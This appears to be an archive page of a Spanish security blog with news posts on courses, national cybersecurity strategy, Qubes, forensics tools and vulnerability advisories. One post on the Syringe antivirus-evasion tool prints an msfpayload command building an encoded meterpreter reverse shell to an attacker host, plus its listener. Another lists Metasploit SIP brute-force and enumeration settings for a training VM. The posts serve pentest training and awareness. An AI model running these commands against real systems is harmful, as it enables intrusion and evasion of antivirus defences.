Mostrando entradas con la etiqueta Noticias. Mostrar todas las entradas
Mostrando entradas con la etiqueta Noticias. Mostrar todas las entradas

Tengo el enorme placer de presentaros el Máster en Seguridad TIC, en el que seguiré dando clase en las Técnicas de Hacking y Pentesting. El máster es la evolución natural del Curso Exp. Universitario en Seguridad TIC que se ha impartido con un rotundo éxito, durante los meses que van de Febrero a Junio 2013, con una nota media de satisfacción en el curso de 4,06 sobre 5, y de 4,42/5 en el profesorado.

¿Qué se tiene preparado para el año que viene?

Formación Flexible

Se puede cursar el Máster por cursos, sobre todo esta pensado para adaptarse a todos los bolsillo (se disponen de 2 becas del 50% del coste). Para obtener el titulo de Máster se deberán de cursar los dos Cursos Exp. Universitario más la realización del Trabajo fin de Máster.


  • Base: Diploma Universitario de Especialista en Seguridad TIC (2 edición)
  • Avanzado: Diploma Universitario de Especialista en Seguridad TIC nivel Avanzado
  • Trabajo Fin de Máster.


Curso Base: Diploma Universitario Especialista en Seguridad TIC

Este curso se corresponde con la segunda edición del Curso Exp. Universitario Seguridad TIC, con la novedades siguientes:

  • El curso tiene 30 créditos ECTS semipresenciales (con 118 horas presenciales). 
  • Las clases presenciales se realizan los viernes (4:30-8:30) y sábados (9:30-13:30) entre Octubre y Enero (incluidos).
  • A la finalización se obtiene un Diploma de Especialista en Seguridad TIC (Titulación Oficial).
Contenido y profesorado:

Contenido del Curso Base - Diploma Especialista Seguridad TIC

¿Donde y cuando se imparte?

En Sevilla. En la Escuela Superior de Ingenieros (C/ Camino de los descubrimientos s/n. Isla de la Cartuja). Entre el 2 de Octubre de 2014 y el 31 enero de 2014 (fechas orientativas).
Admisión y Matricula

Es necesario estar en posesión de algún titulo universitario (graduado o equivalente o superior) preferentemente en ingeniería. 
  • Coste del Curso: 1.696€ (se Ofrecen 2 Becas con reducción del 50%)
  • Preinscripción y matrícula entre el 1 y el 20 de Septiembre de 2013 . 
  • Se ofertan 18 plazas.
Curso Avanzado: Diploma Universitario Especialista en Seguridad TIC nivel Avanzado

Es un curso avanzado para perfeccionar lo aprendido en el curso Base y adquirir nuevos conocimientos de nivel avanzado, además:

  • El curso tiene 30 créditos ECTS (con 98 horas presenciales en los módulos 1-5).
  • Las clases presenciales se realizan los viernes (4:30-8:30) y sábados (9:30-13:30) entre Febrero y Mayo (incluidos).
  • A la finalización se obtiene un Diploma de Especialista en Seguridad TIC nivel Avanzado (Titulación Oficial).
Contenido y profesorado:

Contenido Curso Avanzado - Diploma Especialista Seguridad TIC nivel Avanzado.

¿Donde y cuando se imparte?

En Sevilla. En la Escuela Superior de Ingenieros (C/ Camino de los descubrimientos s/n. Isla de la Cartuja). Entre el 2 de Febrero de 2014 y el 31 Mayo de 2014 (fechas orientativas).

Admisión y Matricula

Es necesario haber superado el 60% del título de Experto en Seguridad (nivel básico), o equivalente (a evaluar por comisión académica). Plazo de matrícula
  • Coste del Curso: 1.696€ (se Ofrecen 2 Becas con reducción del 50%)
  • Preinscripción y matrícula entre el 1-20 de enero de 2014.
  • Solamente 18 plazas. 

Novedad: 

Si. Tiene como requisito hacer 70h de prácticas en una de las empresas colaboradoras. El 56% de las clases se imparte en Laboratorios de la ESI.

Titulación Oficial de Máster en Seguridad TIC

Para ello se debe de cursar el Trabajo Fin de Máster, ello consiste en un trabajo académicamente dirigido por el profesorado del Máster. El trabajo tiene asignados 6 créditos ECTS (unas 150 horas de trabajo total) y no tiene clases presenciales excepto las sesiones de seguimiento que acuerden cada alumno y su tutor. La finalización existosa del trabajo otorga el título de Máster.

Admisión y matrícula

El requisito es la matriculación conjunta con el curso de nivel avanzado, que comparten idénticos requisitos. (véase el apartado superior).

  • Coste del Trabajo Fin de Máster: 345€
  • Preinscripción y matrícula entre el 1 y el 20 de Enero de 2014 . 
  • Se ofertan 18 plazas.
!! No os lo podéis perder ¡¡ Tanto para profesionales que deseen perfeccionar sus conocimientos como para aquellos que desean incorporarse al mundo laboral con fuertes nociones en Seguridad de la Información.

Orientación Profesional

Impartido por profesionales del sector, pertenecientes a:



Las técnicas de Hacking y Pentesting son impartidas por mi gracias a @st2labs (www.st2labs.com).

#No olvides compartirlo en las redes sociales | Ayúdanos a llegar al mayor número de personas.
Gracias.

EVENTO

La situación de la Ciberseguridad Industrial en España

El Centro de Ciberseguridad Industrial realiza su presentación oficial en este primer evento de “La Voz de la Industria” donde estarán presentes los principales actores de la Industria, CEPSA, IBERDROLA, TECNALIA, TÉCNICAS REUNIDAS, INTECO y CNPIC para contar sus experiencias.

Organiza: El Centro de Ciberseguridad Industrial

¿Donde?

Edificio de Técnicas Reunidas, C/Arapiles, 14. Salón de Actos

¿Cuando?

20 de Junio, 9:30h

Temática

En este evento se presentará el Mapa de Ruta de la Ciberseguridad Industrial en España 2013-2014, en el que han participado las principales organizaciones privadas e instituciones públicas. INTECO y CNPIC nos darán su visión de la Participación Público-Privada, como mecanismo fundamental para mejorar la Ciberseguridad Industrial en España.

Se mostrarán los desafíos de Ciberseguridad en Smart Grid, una de las principales preocupaciones del gobierno y de las compañías eléctricas. En el evento se presentará los retos que deberán afrontar los proveedores de servicios de Ciberseguridad Industrial. Contaremos con la presencia de Usuarios finales, como Cepsa e Iberdrola, Instituciones públicas como Inteco y CNPIC y Proveedores para debatir en una mesa redonda sobre los éxitos y fracasos de la concienciación en Ciberseguridad Industrial.

Este evento está dirigido a todas las organizaciones y profesionales interesados en mejorar la Ciberseguridad industrial en Iberoamérica y especialmente a los más de 300 miembros con los que cuenta el Centro.

Más Información: http://www.cci-es.org/

Vía:
www.grupocontrol.com
INTECO


En el artículo de hoy voy a resumir la nueva Estrategia Nacional de Seguridad presentada hoy viernes 31 de Mayo del 2013 por el Gobierno de España, donde centraré la atención en los tres puntos que he considerado mas importante o "claves" de la misma, siempre bajo mi opinión y utilizando el prisma de la Seguridad de la Información.

Introducción

Así comienza la Estrategia Nacional de Seguridad del 2013:

 "La Estrategia de Seguridad Nacional 
es una revisión de la Estrategia 
Española de Seguridad de 2011. Como 
instrumento de su tiempo, refleja los 
riesgos y amenazas que es necesario 
encarar en un mundo que está cambiando 
profunda y constantemente. Se contempla 
el concepto de seguridad de una manera 
amplia y acorde con estas transformaciones 
globales que afectan al Estado y a la vida 
diaria del ciudadano" [ESN 2013]
La nueva ENS (Estrategia Nacional de Seguridad) ha sido dividida en 5 capítulos que son los siguientes:

ENS 2013 - Indice de capítulos

En el capítulo 3 "Riesgos y amenazas para la Seguridad Nacional" hace un recorrido sobre las principales amenazas y riesgo para la seguridad nacional, pero los puntos más interesante, en mi opinión, y utilizando como referencia la seguridad de la información, el capítulo 4 y 5 contienen las "claves" de la estrategia al menos en lo que a Seguridad de la información se refiere.

Por tanto, considero que los puntos más importantes de la nueva estrategia de seguridad nacional #PNS2013 son:

Líneas de actuación estratégicas en #Ciberseguridad:

El objetivo es "Garantizar un uso seguro de las redes y los sistemas de información a través del fortalecimiento de nuestras capacidades de prevención, detección y respuesta a los ciberataques"


A este respecto, las líneas de actuación son:

Líneas de actuación en Ciberdefensa.

1.- Incremento de la capacidad de prevención, detección, investigación y respuesta ante las ciberamenazas con apoyo en un marco jurídico operativo y eficaz. Se mejorarán los procedimientos y se impulsarán los recursos necesarios con especial énfasis en las  Administraciones Públicas, las infraestructuras críticas, las capacidades militares y de defensa y todos aquellos sistemas de interés nacional.

2.- Garantía de la seguridad de los sistemas de información y las redes de comunicaciones e infraestructuras comunes a todas las Administraciones Públicas. Se finalizará la implantación del Esquema Nacional de Seguridad, previsto en la Ley 11/2007, de 22 de junio, mediante el refuerzo de las capacidades de detección y la mejora de la defensa de los sistemas clasificados. Se fortalecerá la seguridad de los sistemas de información y las redes de comunicaciones que soportan las infraestructuras críticas. Se impulsará la normativa sobre protección de infraestructuras críticas con el desarrollo de las capacidades necesarias para la protección de los servicios esenciales.

3.- Mejora de la seguridad y resiliencia de las Tecnologías de la Información y la Comunicación (TIC) en el sector privado a través del uso de las capacidades de los poderes públicos. Se impulsarán y liderarán actuaciones destinadas a reforzar la colaboración público-privada y la seguridad y robustez de las redes, productos y servicios de las TIC empleados por el sector industrial.

4.- Promoción de la capacitación de profesionales en ciberseguridad e impulso a la industria española a través de un Plan de I+D+i.

5.- Implantación de una cultura de ciberseguridad sólida. Se concienciará a los ciudadanos, profesionales y empresas de la importancia de la seguridad de la información y del uso responsable de las nuevas tecnologías y de los servicios de la sociedad del conocimiento. 

6.- Intensificación de la colaboración internacional. Se promoverán los esfuerzos tendentes a conseguir un ciberespacio internacional donde se alineen las iniciativas de todos los países que persiguen un entorno seguro y fiable. En todo momento se salvaguardarán los intereses nacionales.

Lineas de actuación estratégicas en #PIC (Protección de Infraestructuras Críticas) 

El objetivo es "Robustecer las infraestructuras que proporcionan los servicios esenciales para la sociedad".

A este respecto, las líneas de actuación son:

Lineas de actuación en PIC

1.- Responsabilidad compartida y cooperación público-privada. Es imprescindible que tanto las Administraciones Públicas como los operadores privados asuman la responsabilidad correspondiente y trabajen de forma coordinada en la protección de las infraestructuras críticas en todo momento. El Gobierno promoverá la creación de un sistema que comprenda a todos los agentes responsables y facilitará los canales y procedimientos de comunicación seguros, que hagan posible la cooperación mutua y el intercambio de información de interés para todas las partes.

2.-  Planificación escalonada. Se impulsará un sistema de planificación escalonada, que permita identificar, evaluar, prevenir y mitigar los riesgos a los que nos enfrentamos, desde la perspectiva más global y estratégica, hasta aquellos activos que se encuentren bajo la responsabilidad de un operador u organización. Este sistema se abordará a partir de un enfoque integral multirriesgo y homogeneizador.

3.-  Equilibrio y eficiencia. El Gobierno aplicará una metodología homogénea que permitirá concentrar los esfuerzos sobre las áreas más vitales: catalogará las infraestructuras de manera priorizada y permitirá una racionalización en la asignación de recursos.

4.- Resiliencia. Más allá de las medidas que doten a los activos críticos de una mayor seguridad, las políticas en materia de protección de infraestructuras críticas deberán promover las acciones necesarias con el fin de lograr un incremento de la capacidad de los sistemas que les permita seguir operando, pese a estar sometidos a un ataque o incidente, aun cuando sea en un estado degradado o debilitado. En este sentido, se debe contemplar la existencia de sistemas redundantes o aislados y la adecuada dotación de elementos de reposición.

5.- Coordinación. La gestión de crisis a nivel gubernamental organizará todas las tareas, responsabilidades y recursos existentes teniendo en cuenta las infraestructuras críticas como parte integrante en las fases de preparación, respuesta y recuperación. Resulta esencial la existencia de una adecuada coordinación operativa entre las organizaciones responsables de la gestión de riesgos y la gestión de crisis.

6.- Cooperación internacional. Se impulsará el cumplimiento del Programa Europeo de Protección de Infraestructuras Críticas (EPCIP) y de la Directiva Europea 2008/114/CE del Consejo, sobre la Identificación y Designación de Infraestructuras Críticas Europeas y Evaluación de la Necesidad de Mejorar su Protección. Ambos instrumentos se entienden como los mejores medios para lograr la consecución de la cooperación de los países europeos y la protección de nuestros intereses nacionales. De la misma manera, se favorecerá la existencia de canales internacionales de información, alerta temprana y respuesta, así como la participación activa en foros internacionales.

7.- Garantía en la seguridad de las infraestructuras críticas conforme a lo expuesto en el Plan Nacional de Protección de Infraestructuras Críticas (PNPIC). Se dotará a estas instalaciones de sistemas redundantes e independientes de otras tecnologías y operadores, dado que sobre ellas descansa el funcionamiento de los servicios esenciales.

Nuevo Sistema de Seguridad Nacional

Entre otras cosas el nuevo sistema de seguridad nacional establece una nueva estructura: "el consejo de seguridad nacional" que será el encargado de supervisar, realizar el seguimiento y control de las líneas de actuación estratégicas,  así como dictar directrices sobre la política de seguridad nacional, campañas de concienciación y aprobar el informe anual de Seguridad Nacional.

A continuación os dejo el esquema que dar forma al consejo de Seguridad Nacional:

Estructura del Consejo de Seguridad Nacional - ESN 2013
Más información en:
[PDF] Esquema Nacional de Seguridad 2013 - Un Proyecto Compartido
Vía_ http://www.lamoncloa.gob.es

No es la primera vez que hablo sobre Qubes en el blog (aquí y aquí), es un proyecto muy interesante que intento seguir de cerca. En esta ocasión voy a contaros que es lo que están preparando la gente de InvisibleThings Labs, capitaneados por .

En marzo, Joanna escribió un artículo muy interesante en su blog, donde explica que era Qubes y qué no es Qubes, y hacia donde se dirige, es decir, en que se ha convertido.

¿Qué es Qubes?

Para empezar Qubes no es una distribución de Linux, solo lo parece debido a que utiliza Fedora 18 como plantilla base para establecer el entorno de ventanas (interfaz de usuario) de control y/o dominio principal. Tampoco es un hypervisor, al uso, basado en XEN, este solo se utiliza para garantizar el aislamiento de las aplicaciones durante su ejecución, creado contenedores aislados seguros mediante la tecnología de  virtualización de XEN.

Bien, entonces ¿Qué es Qubes?

  • Una forma sencilla de como se puede configurar de forma segura y usar virtualización para trabajar con entornos (dominios) seguros de trabajo y minimizar al máximo los riesgos.

  • Proporciona un interfaz de usuario (insolated) segura, mientras se ejecutan al mismo tiempo múltiples aplicaciones en diferentes entornos virtualizados todos juntos y manejados bajo el dominio principal y/o de escritorio.

  • Garantiza el intercambio de información entre dominios (entornos virtuales (AppsVM)) de forma segura con una gestión centralizada de las políticas, como por ejemplo el intercambio de ficheros.

  •  Incluye un modulo para crear servicios adicionales (addons / plugins) que amplian las funcionalidades y características de framework. Por ejemplo, TorVM, Split GPG, o conversor seguro de documentos PDF, etc.

  • Posibilidad de manejar múltiples sistemas operativos ejecutándose en diferentes entornos seguros y aislados, según las necesidades de cada uno.
Esto es solo el principio, según palabras de la propia Joanna, Qubes se ha transformado en un framework que pretender revolucionar la forma de entender la gestión de los sistemas operativos y/o aplicaciones.

La próxima versión de Qubes (v3) dará paso a Qubes Odyssey Framework, donde se introducirá un nuevo concepto que permitirá abstraer la capa que proporciona la seguridad de los entornos en ejecución, es decir, el hypervisor, lo que se le conoce como Qubes HAL: Hypervisor Abstraction Layer.

Pero de ello (Qubes HAL) os hablaré en otro artículo.

Un Saludo.

El mes de Mayo 2013, ha sido excepcional, no solo por sus fiestas como los "Patios" declarado como patrimonio de la humanidad, las cruces o su feria, sino porque este año se han celebrado las primeras, de muchas, jornadas de ciberseguridad, bautizadas con el nombre de #SecurimaTICa2013, en las que tenido el placer de participar, tanto en calidad de "ponente" como en la de asistente.

El éxito de participación fue tal que ya se habla de #SecurimaTICa2014 donde se espera llenar de nueva la sala y reunir, de nuevo, a importantes ponentes del panorama nacional.


Mini-Crónica

Las jornadas nos dejaron momentos épicos, donde apareció el efecto DEMO junto con su hermano mayor Murphi, solventados con soltura por @wolfinside, quién no necesito ni las transparencias para ganarse a los asistentes y terminar ofreciendo una gran ponencia. A lo que hay que unir el resto de los ponentes y una de las mesas redondas más participativa de las que haya presenciado.

Sin olvidar por supuesto, la mención especial a @omarbv Senior Security Analyst, organizador de la RootedCON y ganador del Reto Hacking planteado por la organización, quién ha publicado un interesante artículo, en su blog, con la solución del mismo.

Mención de Honor para @omarbv - SecurimaTICa2013

Seguridad en la Empresa - La amenaza de los smartphones

Con ese titulo tan sugerente, estuve tentado de realizar una "friki-charla" donde utilizase la estrella de la muerte para establecer un "símil - comparativo" entre la EMPRESA (Imperio) y los smartphones (Los rebeldes).

Pero lo que de verdad ocurrió, fue grabado y editado por la organización en el siguiente vídeo, espero que disfruten de la charla.




Para los que no pudieron estar en la pasada edición de Securimatica, la organización ha editado algunas de las ponencias que podéis consultar a continuación:

Vídeos de las Jornadas de ciberseguridad | SecurimaTICa2013



Manuel Camacho

Taller seguridad Wifi

Antonio Osuna

Jugando a ser un CSI

Pablo Maza

Virtualización Grandes Organizaciones

Josep Bardallo

Seguridad en la nube

Francisco Ramírez y Juan Capellán

Obligaciones LOPD

Albert Soriano

Seguridad dispositivos y datos

Joaquín González

Lo esencial y lo crítico




Normalmente no suelo comentar y/o realizar opinión alguna sobre libros, especialmente, los correspondientes a la seguridad de la información. Pero en esta ocasión, he tenido el placer de leer recientemente un libro practico y muy útil, con ejemplos "claros" que muestran la capacidad de la herramienta sobre la que versa.

Se trata de Instant Traffic Analysis with Tshark How-To, escrito por Borja Merico (@borjamerino). Un libro escrito en ingles, fácil de leer que incluye ejemplos prácticos desde el primer momento.

¿De que trata?

Utilizando ejemplos prácticos que se van desarrollando con una dificultad gradual, ofrece una forma diferente de conocer el funcionamiento y/o las opciones que ofrece la herramienta, de análisis T-shark.

T-Shark es el analizador de protocolos en línea de comandos incluido en el programa wireshark. Con esta herramienta se pueden realizar capturas de tráfico de red, analizar los paquetes capturados, obtener estadísticas, datos transferidos, etc, todo ello desde la línea de comandos del sistema. 

En el libro aprenderás a utilizar la herramienta para detectar un ataque del tipo ARPSpoofing, detectar tráfico de una red botnet y/o malware, entre otros.



¿Quiero leer algo antes de decidirme?


Aquí tiene un ejemplo de lo que vas a encontrar en el libro: "Cómo convertirte en un experto analizando el tráfico de red en un análisis forense con la herramienta T-Shark? ... 

http://www.packtpub.com/article/analyzing-network-forensic-data-become-expert
Más lo podrás conseguir en:
¿Donde se puede comprar?

Se encuentra disponible en formato electrónico y/o físico (tapa blanda).

Packpub - Instant Traffic Analysis with T-Shark How-To
Amazon  - Instant Traffic Analysis with T-Shark How-To


#ST2Labs
















Hace un tiempo publique una serie de tres artículos sobre las diferentes forma de crear un fichero ejecutable  (exe) con capacidad de evasión del sistema Antivirus utilizando el framework de seguridad #Metasploit. 

En su momento estuve tentado de crear un script que generase un ejecutable con un PAYLOAD según unas especificaciones previas, y  que automáticamente comprobase en Virustotal su eficacia. Ahora, buceando en Internet he ido a parar a http://www.commonexploits.com quién ha creado precisamente un script que realiza exactamente eso, es decir, generar un payload con metasploit con técnicas de evasión de antivirus.

Sin embargo, aunque el script (AV0id) es muy interesante, ese mismo artículo me ha puesto sobre la pista de una herramienta de gran utilidad,  cuyo objetivo es evadir (bypass) los sistema antivirus. Es precisamente sobre esto ultimo de lo que voy a hablar a continuación.

¿Qué es syringe?

Durante un test de penetración puede resultar muy útil disponer algún ejecutable con capacidad de "puerta trasera" (backdoor) con el que demostrar la debilidad encontrada tomando el control del equipo objeto del análisis. Es en este punto donde entra en juego el Syringe creado por un investigador de Seguridad independiente llamado Hasan (aka inf0g33k). Hasan publica un documento técnico (PDF) donde explica la técnica que utiliza para cargar la shell, generada con Metasploit, en memoria y demuestra con un ejemplo su funcionamiento.

La herramienta, básicamente carga en memoria un PAYLOAD de tipo meterpreter generado por Metasploit, utilizando técnicas de ENCODING de forma que pueda evadir el sistema Antivirus del sistema. (Asunto que ya se ha tratado en otra ocasión en el blog).

¿Cómo funciona?

Esta herramienta, syringe, utiliza la función VirtualAlloc para reservar una región de la memoria en Windows con permisos de ejecución específicos (read and write). Esta función requiere que el shell code este formado con caracteres alfanuméricos para que puede ser ejecutado. 



Para generar el código (shellcode) utiliza el framework Metasploit, luego genera un ejecutable utilizando la herramienta 7z y una serie de bash script,  fragmento de código en visual basic script (vbs) simplemente es para oculta el terminal de consola durante la ejecución del bash script. Cómo nota de interes, el autor, en su herramienta syringe introduce el código (shellcode) en un bloque estructurado del tipo SEH (Structured Exception Handler) que será el que habilite la ejecución del código (shellcode) de forma exitosa, a través de la función VirtualAlloc.

Los parámetros utilizado para generar el PAYLOAD son:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=IP_KalinLinux R | msfencode -a x86 -e
x86/alpha_mixed -t raw BufferRegister=EAX

Una vez creado el ejecutable SFX, se debe de iniciar un servidor que gestione las conexiones en el puerto 4444 del shellcode generado, esto se hace tal y como se vio en mi artículo sobre Metasploit, de forma que:

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
EXITFUhread LPORT=4444 LHOST=IP_KaliLinux E
Llegados a este punto, solo es necesario ejecutar el fichero SFX (exe) generado [bash script makeExeFromBat.bat] y tendremos una sesión de meterpreter sobre el equipo de la victima.

Download


Licencia: GNU GPL v3

Fichero: Syringe_Pack
SHA: b720d32f2ad43defab223d85646ac6b3786f9de7



Referencias:

Via: @teamcymru



¿Qué es VIPROY?

Es un servidor SIP (Session Initiation Protocol) basado en Asterisk, configurado y preparado para el entrenamiento de los Pentester, es decir, un servidor vulnerable preparado para trabajar y soportar comunicaciones por VoIP. Esta pensado para conseguir averiguar el password (cracking) y obtener acceso a los buzones de voz.
SIP es el protocolo de señalización que hace posible el establecimiento de las llamadas de voz por Internet, es decir por IP.
Este Kit se ha desarrollado para mejorar las habilidades de los Pentester en los entornos de VoIP, en especial las pruebas de seguridad que se realizan para los procesos de autenticación. 

VIPROY permite poner a prueba el sistema de autenticación, proporcionando de este modo un entrenamiento muy interesante para aquellos profesionales (Pentester) que se enfrenten a un test de penetración con infraestructura de VoIP. 

Las pruebas o test que se incluyen en el Kit, son:

Options tester: manipulación de las opciones de comunicación en la VoIP, con el protoclo SIP se puede indicar el codec que se utiliza en la comunicación, así como el puerto de conexión. Se puede poner a prueba las opciones.

Brute force: Ataques de fuerza bruta en el proceso de identificación de cada teléfono/ usuario.

Enumerator: Se puede poner en practica la técnica de conseguir información sobre los usaurios y/o terminales de VoIP, que tiene el servidor registrados.

Invite tester: pruebas en el proceso de llamada de los usuarios de VoIP.

Trust analyzer, Proxy/Registration tester: evaluar la seguridad del proceso de registro y la comunicación a través de proxy.

Como se puede apreciar, VIPROY ofrece un entorno ideal para el entrenamiento de los Pentester orientados a las infraestructuras con VoIP.

PREPARANDO EL ESCENARIO

El KIT consiste en un máquina virtual preparada y lista para su funcionamiento; se puede descargar en siguiente enlace:

MD5 Hash of VulnVoIP.7z: 1411bc06403307d5ca2ecae47181972a
VMware: vulnvoip.7z
Las características principales son: x86, VMWare. 512MB RAM, NAT network.

Por supuesto, para usar correctamente el entorno, se debe de conocer como estan configurados los diferentes módulos del Servidor Asterisk. 


A continuación, copio la información que la página oficial proporciona:

Global Settings

setg CHOST 192.168.1.99 #Local Host
setg CPORT 5099 #Local Port
setg RHOSTS 192.168.1.1-254 #Target Network
setg RHOST 192.168.1.201 #Target Host

Basic Usage of OPTIONS Module

use auxiliary/scanner/sip/vsipoptions
show options
set THREADS 255
run

Basic Usage of REGISTER Module

use auxiliary/scanner/sip/vsipregister
show options
run

set LOGIN true
set USERNAME 101
set PASSWORD s3cur3
run

Basic Usage of INVITE Module

use auxiliary/scanner/sip/vsipinvite
set FROM 2000
set TO 1000
run

set LOGIN true
set FROM 102
set USERNAME 102
set PASSWORD letmein123
run

set DOS_MODE true
set NUMERIC_USERS true
set NUMERIC_MIN 200
set NUMERIC_MAX 205
run

Basic Usage of ENUMERATOR Module

use auxiliary/scanner/sip/vsipenumerator
show options
unset USERNAME
set USER_FILE /tmp/files/users2
set VERBOSE false
set METHOD SUBSCRIBE
run

unset USER_FILE
set METHOD SUBSCRIBE
set NUMERIC_USERS true
set NUMERIC_MAX 2300
run

set METHOD REGISTER
run

Basic Usage of BRUTE FORCE Module

use auxiliary/scanner/sip/vsipbruteforce
show options
set RHOST 192.168.1.201
set USERNAME 2000
set PASS_FILE /tmp/files/passwords
set VERBOSE false
run

unset USERNAME
set USER_FILE /tmp/files/users2
run

unset USER_FILE
set NUMERIC_USERS true
set NUMERIC_MAX 500
run

Basic Usage of Trust Analyzer Module

use auxiliary/scanner/sip/vsiptrust
show options
set SRC_RHOSTS 192.168.1.200-210
set SRC_RPORTS 5060
set SIP_SERVER 192.168.1.201
set INTERFACE eth0
set TO 101
run

show options
set ACTION CALL
set SRC_RHOSTS 192.168.1.202
set FROM James Bond
run

Basic Usage of SIP Proxy Module

use auxiliary/scanner/sip/vsipproxy
show options
set PRXCLT_PORT 5060
set PRXCLT_IP 192.168.1.99
set PRXSRV_PORT 5089
set PRXSRV_IP 192.168.1.99
set CLIENT_IP 192.168.1.120
set CLIENT_PORT 5060
set SERVER_IP 192.168.1.201
set SERVER_PORT 5060
set CONF_FILE /tmp/sipproxy_replace.txt
set LOG true
set VERBOSE false
run



EJEMPLO DE USO: DEMO

A continuación os dejo un vídeo de demostración con #Metasploit SIP Module,  donde se puede ver algunos ataques realizados dentro de este entorno vulnerable, por poner un ejemplo: SIP Service Discovery, ejecutando un REGISTER sin credenciales.



Para más información:


C.A.I.N.E (Computer Aided Investigative Environment)


¿Qué es C.A.I.N.E?

Es una distribución de Linux especialmente orientada al análisis forense informático. Esta distribución lleva de fabrica pre-instaladas cientos de aplicaciones destinadas a facilitar la tarea del analista forense. Además ofrece:
  • Entorno de trabajo perfectamente orientado a completar las fases de la metodología forense.
  • Interfaz gráfica amigable
  • Proceso semi-automático en la generación del Informe final de resultados.

Novedades

En la versión 4.0 trae la siguientes novedades con respecto a su anterior versión:

Actualización del Kernel de Linux:
  • Kernel 3.2.0-38
Se han añadido a la distribución las siguientes aplicaciones:

  • LibreOffice 4.0.1 
  • Sqliteman
  • Remote Filesystem Mounter 
  • sdparm 
  • netdiscover

Lista de Aplicaciones

De entre todas las aplicaciones disponibles vamos a destacar las siguientes:

Foremost

Foremost is a console program to recover files based on their headers, footers, and internal data structures. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. 

TheSleuthKit 

The Sleuth Kit (TSK) is a collection of UNIX-based command line tools that allow you to investigate a computer. Autopsy is a frontend for TSK which allows browser-based access to the TSK tools.

Log2Timeline

log2timeline, a framework for automatic creation of a super timeline. The main purpose is to provide a single tool to parse various log files and artifacts found on suspect systems (and supporting systems, such as network equipment) and produce a timeline that can be analysed by forensic investigators/analysts.

Autopsy 

The Autopsy Forensic Browser is a graphical interface to the command line digital investigation analysis tools in The Sleuth Kit. Together, they can analyze Windows and UNIX disks and file systems (NTFS, FAT, UFS1/2, Ext2/3).
Conduct File Listing, View File Content, Compare files in user created or downloaded Hash Databases, File Type Sorting by internal signatures, Create a Timeline of File Activity, conduct Keyword Searches, File System Meta Data Analysis, Data Unit (File Content) Analysis in multiple formats, File System Image Details: Case Management of one or more host computers, Event Sequencer allows you to add time-based events from other systems (ie firewall/ids logs), Notes about case, Image Integrity verification, Report Creation, Audit Logging of investigation.





Download

NBCAINE 4.0 (MD5) - GARR/MIRROR
NBCaine is the ISO of a live USB version of CAINE for NetBooks ready for USB pendrive. 

NOTA: Para la versión USB necesitarás mas de 2GB de capacidad. Puedes utilizar cualquiera de la siguientes herramientas para llevar a cabo la tarea ( Rufus | UnebootIn ).


El popular programa para leer documentos en PDF ha emitido ayer 13 de Febrero 2013 un boletín de seguridad donde alerta de la existencia de una vulnerabilidad crítica en varios de sus productos.

Además TheHackersNews informa que esta vulnerabilidad esta siendo explotada intensamente en Internet, por lo que se solicita que se extreme la precaución a la hora de abrir PDF recibidos vía correo electrónico o disponibles en páginas WEB. 

SOLUCIÓN

Por el momento no existe una solución, los desarrolladores de Adobe están trabajando en el problema, y se espera que pronto lancen una actualización que resuelva el problema. 

Mientras tanto, se recomienda antes de abrir PDF, intentar verificar (si es o no de confianza) la página WEB y disponer de medidas de protección adicionales actualizadas como son:







En San Valentín cuidado con los PDF "amorosos" que recibís!! ;)

Más:
Rapid7 ha publicado un whitepaper [PDF] donde explican detalladamente todas y cada una de las vulnerabilidades encontradas en las diferentes implementaciones del protocolo UPnP.

Las vulnerabilidades detectadas son:

  • Errores de programación en el protocolo SSDP (UPnP discovery Protocol) que puede ser utilizado por los atacante para provocar una DoS o ejecución de código arbitrario.
  • Existe una vulnerabilidad en  la interfaz de control de UPnP (SOAP) que expone la red privada a ataques desde Internet o incluso a la capacidad de extraer información sensible de la red privada.
  • Además, los errores (vulnerabilidades) encontradas en las implementaciones de UPnP HTTP y SOAP permiten a los atacantes llevar a cabo DoS o ejecución de código arbitrario.
Estas vulnerabilidades han sido solucionadas en la versión 1.6.18 del kit de desarrollo de UPnP, sin embargo son muchos los dispositivos y fabricantes que implementan este protocolo y que por tanto tardarán cierto tiempo en actualizar.

No hay más que observar la siguiente gráfica para hacerse una idea de las distintas implementaciones del protocolo, que esta ampliamente distribuido.



Por ejemplo: todos los router que instalan las operadores de telecomunicaciones tiene activado por defecto al protocolo UPnP, por lo que es muy probable que prácticamente todas las línea de ADSL se vea afectadas en mayor o menor medida por estas vulnerabilidades.

Es por ello que existe un elevado grado de exposición lo que establece estas vulnerabilidades en una alta probabilidad de ataque, existiendo un alto impacto. Para apoyar esta apreciación, el Rapid7 ha incluido en el whitepaper unas pequeñas estadisticas, que copio a continuación:

Estadísticas | Alto grado de exposición e Impacto.

Más Información sobre las vulnerabilidades:
  • Exploitable Stack Overflow in the MiniUPnP SOAP Handler | CVE-2013-0230.
  • Denial of Service Flaws in the MiniUPnP SSDP Parser | CVE-2013-0229.
  • Exploitable Vulnerabilities in the Portable SDK for UPnP Devices SSDP Parser | CVE-2012-5965


Solución

 1. Esperar la actualización del fabricante.
 2. La opción más recomendada, es desactivar inmediatamente el protocolo UPnP en el dispositivo de comunicaciones.

Rapid7 ha creado una aplicación que permite descubrir si nuestra red es vulnerable o no, se llama ScanNow UPnP y se puede descargar en el siguiente enlace:

http://updates.metasploit.com/data/ScanNowUPnP.exe | Microsoft Defender o Google Chrome que ha detectado el programa como Malware, sin embargo un análisis en VirusTotal confirma que no es un Malware (al menos conocido) :) Enlace del análisis de VirusTotal.

Para terminar, os dejo una definición de lo que se entiende por UPnP:

¿Qué es UPnP?

Universal Plug and Play (UPnP) es un conjunto de protocolos de comunicación que permite a periféricos en red, como ordenadores personales, impresoras, pasarelas de Internet, puntos de acceso Wi-Fi y dispositivos móviles, descubrir de manera transparente la presencia de otros dispositivos en la red y establecer servicios de red de comunicación, compartición de datos y entretenimiento. UPnP está diseñado principalmente para redes de hogar sin dispositivos del ámbito empresarial.[From Wikipedia]

Más información: Security Flaws in UPnP.

DNSChef es una herramienta de seguridad especialmente orientada y destinada a profesionales de Seguridad dedicados a probar los limites de la seguridad de los Sistemas (Pentester) y/o aquellos investigadores que se dedican a analizar las muestras de "Malware".

En cualquiera de los contextos, DNSChef es un software capaz de ejecutar un DNS Proxy (también conocido como fake DNS), es decir, todo un sistema para manipular las tramas de peticiones / respuestas del protocolo DNS.

